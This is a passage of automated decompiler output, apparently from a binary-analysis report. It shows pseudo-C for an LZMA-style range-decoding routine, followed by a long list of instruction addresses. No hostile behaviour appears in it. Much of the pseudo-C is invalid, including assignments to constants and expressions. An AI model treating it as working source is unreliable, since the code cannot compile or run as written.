											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                              0x00406d5a
                                                              0x00406d5a
                                                              0x00406d5a
                                                              0x00406d5a
                                                              0x00406d60
                                                              0x00406d64
                                                              0x00406d68
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x00000000
                                                              0x00000000
                                                              0x00407093
                                                              0x0040709c
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070ea
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x00407091
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ec
                                                              0x004070ec
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x004071a1
                                                              0x004071ab
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x004071c3
                                                              0x004071c7
                                                              0x004071c7
                                                              0x0040706f
                                                              0x00407075
                                                              0x0040707c
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x00000000
                                                              0x00407087
                                                              0x004070f1
                                                              0x004070fe
                                                              0x00407101
                                                              0x0040700d
                                                              0x0040700d
                                                              0x0040700d
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067bf
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067c9
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406824
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x0040686e
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x00406898
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068de
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x00407195
                                                              0x00000000
                                                              0x00407195
                                                              0x00406fec
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00407007
                                                              0x00407007
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00000000
                                                              0x004069b2
                                                              0x0040692c
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406977
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x0040698e
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00000000
                                                              0x00406cfd
                                                              0x00406ce8
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
